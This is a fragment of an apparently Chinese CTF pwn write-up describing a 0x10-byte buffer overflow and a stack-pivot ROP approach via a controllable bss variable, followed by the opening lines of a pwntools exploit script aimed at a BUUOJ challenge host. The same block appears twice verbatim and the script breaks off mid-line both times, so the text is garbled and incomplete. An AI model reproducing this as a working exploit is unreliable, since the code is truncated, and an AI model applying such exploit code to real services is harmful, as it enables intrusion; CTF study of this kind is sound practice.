例行检查
程序逻辑
看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。
from pwn import *
io=remote('node3.buuoj.cn','29302')
bank=0x0601080
leave=0x400699
p
例行检查
程序逻辑
看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。
from pwn import *
io=remote('node3.buuoj.cn','29302')
bank=0x0601080
leave=0x400699
p